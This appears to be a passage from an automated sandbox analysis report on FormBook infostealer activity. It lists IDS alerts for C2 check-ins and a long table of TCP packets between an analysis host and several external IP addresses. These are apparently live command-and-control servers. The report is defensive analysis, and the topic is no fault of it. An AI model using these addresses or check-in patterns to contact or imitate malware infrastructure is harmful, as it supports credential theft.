                                                                  2024-10-07T10:39:50.288138+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999545.130.41.1380TCP
                                                                  2024-10-07T10:39:52.808450+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104999645.130.41.1380TCP
                                                                  2024-10-07T10:39:59.396243+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10499973.33.130.19080TCP
                                                                  2024-10-07T10:40:00.896362+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10499983.33.130.19080TCP
                                                                  2024-10-07T10:40:04.423030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10499993.33.130.19080TCP
                                                                  2024-10-07T10:40:08.997373+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.10500003.33.130.19080TCP
                                                                  2024-10-07T10:40:18.911820+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050001203.175.9.12880TCP
                                                                  2024-10-07T10:40:21.459216+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002203.175.9.12880TCP
                                                                  2024-10-07T10:40:24.005624+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050003203.175.9.12880TCP
                                                                  2024-10-07T10:40:26.456468+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050004203.175.9.12880TCP
                                                                  2024-10-07T10:40:32.606531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105000538.47.233.6580TCP
                                                                  2024-10-07T10:40:35.345060+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105000638.47.233.6580TCP
                                                                  2024-10-07T10:40:37.913354+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.105000738.47.233.6580TCP
                                                                  2024-10-07T10:40:40.524385+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.105000838.47.233.6580TCP
                                                                  2024-10-07T10:40:47.083973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050009172.81.61.22480TCP
                                                                  2024-10-07T10:40:49.630667+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050010172.81.61.22480TCP
                                                                  2024-10-07T10:40:52.177647+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050011172.81.61.22480TCP
                                                                  2024-10-07T10:41:14.589098+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050012172.81.61.22480TCP
                                                                  2024-10-07T10:41:20.404455+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050013194.58.112.17480TCP
                                                                  2024-10-07T10:41:22.943302+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050014194.58.112.17480TCP
                                                                  2024-10-07T10:41:25.484237+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050015194.58.112.17480TCP
                                                                  2024-10-07T10:41:28.052429+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050016194.58.112.17480TCP
                                                                  2024-10-07T10:41:36.640485+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.10500173.33.130.19080TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 7, 2024 10:38:23.568859100 CEST4997680192.168.2.1076.223.105.230
                                                                  Oct 7, 2024 10:38:23.573883057 CEST804997676.223.105.230192.168.2.10
                                                                  Oct 7, 2024 10:38:23.574645042 CEST4997680192.168.2.1076.223.105.230
                                                                  Oct 7, 2024 10:38:23.582180977 CEST4997680192.168.2.1076.223.105.230
                                                                  Oct 7, 2024 10:38:23.587302923 CEST804997676.223.105.230192.168.2.10
                                                                  Oct 7, 2024 10:38:24.034672976 CEST804997676.223.105.230192.168.2.10
                                                                  Oct 7, 2024 10:38:24.034835100 CEST804997676.223.105.230192.168.2.10
                                                                  Oct 7, 2024 10:38:24.034899950 CEST4997680192.168.2.1076.223.105.230
                                                                  Oct 7, 2024 10:38:24.039377928 CEST4997680192.168.2.1076.223.105.230
                                                                  Oct 7, 2024 10:38:24.050106049 CEST804997676.223.105.230192.168.2.10
                                                                  Oct 7, 2024 10:38:39.569861889 CEST4997780192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:39.574968100 CEST804997765.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:39.575062037 CEST4997780192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:39.586091995 CEST4997780192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:39.591034889 CEST804997765.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:40.233946085 CEST804997765.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:40.234294891 CEST804997765.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:40.234348059 CEST4997780192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:41.099114895 CEST4997780192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:42.120443106 CEST4997880192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:42.125622988 CEST804997865.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:42.125735044 CEST4997880192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:42.136537075 CEST4997880192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:42.141381025 CEST804997865.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:42.783889055 CEST804997865.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:42.784030914 CEST804997865.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:42.784111023 CEST4997880192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:43.646058083 CEST4997880192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:44.664866924 CEST4997980192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:44.669796944 CEST804997965.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:44.669909000 CEST4997980192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:44.680650949 CEST4997980192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:44.685496092 CEST804997965.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:44.685540915 CEST804997965.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:45.357409954 CEST804997965.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:45.357645035 CEST804997965.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:45.357707977 CEST4997980192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:46.193017006 CEST4997980192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:47.211638927 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:47.216552973 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:47.216634035 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:47.224376917 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:47.229173899 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.458664894 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.458704948 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.458714962 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.458940983 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:48.459136963 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.459182978 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:48.461807966 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:48.770972967 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:48.829121113 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.829288960 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:48.835433006 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.836153030 CEST804998065.21.196.90192.168.2.10
                                                                  Oct 7, 2024 10:38:48.836225033 CEST4998080192.168.2.1065.21.196.90
                                                                  Oct 7, 2024 10:38:53.645481110 CEST4998180192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:53.650361061 CEST8049981162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:53.650486946 CEST4998180192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:53.661032915 CEST4998180192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:53.665987015 CEST8049981162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:54.248193979 CEST8049981162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:54.248229027 CEST8049981162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:54.248351097 CEST4998180192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:55.177547932 CEST4998180192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:56.195982933 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:56.241357088 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:56.241463900 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:56.252007961 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:56.256954908 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.755804062 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:57.858441114 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.858457088 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.858494997 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.858553886 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:57.858586073 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:57.858616114 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:57.859232903 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.859271049 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:57.859998941 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.860033035 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:57.862133980 CEST8049982162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:57.862189054 CEST4998280192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:58.774146080 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:58.779171944 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:58.779325008 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:58.790831089 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:38:58.795756102 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:58.795814991 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:59.405152082 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:59.405167103 CEST8049983162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:38:59.405236959 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:00.302438974 CEST4998380192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.321463108 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.677294016 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:01.677436113 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.684482098 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:01.690279007 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:02.300024033 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:02.300406933 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:02.300481081 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:02.305731058 CEST4998480192.168.2.10162.0.238.246
                                                                  Oct 7, 2024 10:39:02.310748100 CEST8049984162.0.238.246192.168.2.10
                                                                  Oct 7, 2024 10:39:09.163688898 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:09.168589115 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:09.168720007 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:09.179605007 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:09.184583902 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.092828035 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.092852116 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.093055010 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:10.093075037 CEST804998546.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:10.093116045 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:10.692924023 CEST4998580192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.712136030 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.717128992 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:11.717283010 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.728627920 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:11.733515978 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.676270008 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.676295996 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.676381111 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:12.677231073 CEST804998646.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:12.677283049 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:13.285190105 CEST4998680192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.295459032 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.300431967 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:14.300534010 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.311151028 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:14.316235065 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:14.316601992 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.263647079 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.263684034 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.263844967 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:15.265903950 CEST804998746.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:15.265959024 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:15.828962088 CEST4998780192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.836874962 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.841835976 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:16.841984034 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.850478888 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:16.855271101 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.791733980 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.791762114 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.791893959 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:17.792633057 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:17.792680025 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:17.795090914 CEST4998880192.168.2.1046.17.172.49
                                                                  Oct 7, 2024 10:39:17.799935102 CEST804998846.17.172.49192.168.2.10
                                                                  Oct 7, 2024 10:39:22.880143881 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:22.885035992 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:22.885149002 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:22.895766020 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:22.900583982 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554140091 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554162025 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554178953 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554233074 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554246902 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554266930 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:23.554266930 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:23.554672956 CEST804998962.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:23.554747105 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:24.412009001 CEST4998980192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.432187080 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.437268972 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:25.437336922 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.454433918 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:25.459429979 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122329950 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122383118 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122414112 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122431040 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122438908 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122453928 CEST804999062.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:26.122565985 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:26.122565985 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:26.958595037 CEST4999080192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.977508068 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.982330084 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:27.982398987 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.993264914 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:27.998598099 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:27.998650074 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656227112 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656358957 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656414032 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656450033 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656480074 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.656511068 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:28.656511068 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:28.656646967 CEST804999162.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:28.658296108 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:29.513932943 CEST4999180192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.524652958 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.529565096 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:30.531305075 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.538971901 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:30.543828964 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200469017 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200494051 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200505972 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200575113 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.200651884 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200666904 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200689077 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:31.200742006 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.200773001 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.205507994 CEST4999280192.168.2.1062.149.128.40
                                                                  Oct 7, 2024 10:39:31.210371017 CEST804999262.149.128.40192.168.2.10
                                                                  Oct 7, 2024 10:39:44.412945986 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:44.417846918 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:44.418541908 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:44.430542946 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:44.435609102 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:45.159245014 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:45.159326077 CEST804999345.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:45.159373045 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:45.943023920 CEST4999380192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.964231014 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.969191074 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:46.969291925 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.980232954 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:46.985048056 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:47.713430882 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:47.713583946 CEST804999445.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:47.713670969 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:48.492248058 CEST4999480192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.509219885 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.516606092 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:49.516696930 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.531136036 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:49.537883043 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:49.538444996 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:50.287682056 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:50.287939072 CEST804999545.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:50.288137913 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:51.036819935 CEST4999580192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.056494951 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.061886072 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.061964989 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.071204901 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.076148033 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.807353973 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.807512999 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:52.808449984 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.812253952 CEST4999680192.168.2.1045.130.41.13
                                                                  Oct 7, 2024 10:39:52.817133904 CEST804999645.130.41.13192.168.2.10
                                                                  Oct 7, 2024 10:39:57.870446920 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:57.875438929 CEST80499973.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:39:57.875509977 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:57.890269041 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:57.895126104 CEST80499973.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:39:59.396243095 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:39:59.401664972 CEST80499973.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:39:59.401716948 CEST4999780192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.423063993 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.428167105 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:00.428261995 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.460304976 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:00.465332031 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:00.895008087 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:00.896362066 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:01.974647045 CEST4999880192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:01.979671001 CEST80499983.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:03.030570030 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:03.035563946 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:03.040929079 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:03.056168079 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:03.061081886 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:03.061335087 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:04.422934055 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:04.423029900 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:04.570954084 CEST4999980192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:04.575786114 CEST80499993.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:05.586980104 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:05.592072010 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:05.592152119 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:05.600244045 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:05.605137110 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:08.992609978 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:08.992640018 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:08.997373104 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:08.997374058 CEST5000080192.168.2.103.33.130.190
                                                                  Oct 7, 2024 10:40:09.002305984 CEST80500003.33.130.190192.168.2.10
                                                                  Oct 7, 2024 10:40:17.380774021 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:17.385936022 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:17.386049986 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:17.397810936 CEST5000180192.168.2.10203.175.9.128
                                                                  Oct 7, 2024 10:40:17.402753115 CEST8050001203.175.9.128192.168.2.10
                                                                  Oct 7, 2024 10:40:18.911819935 CEST5000180192.168.2.10203.175.9.128
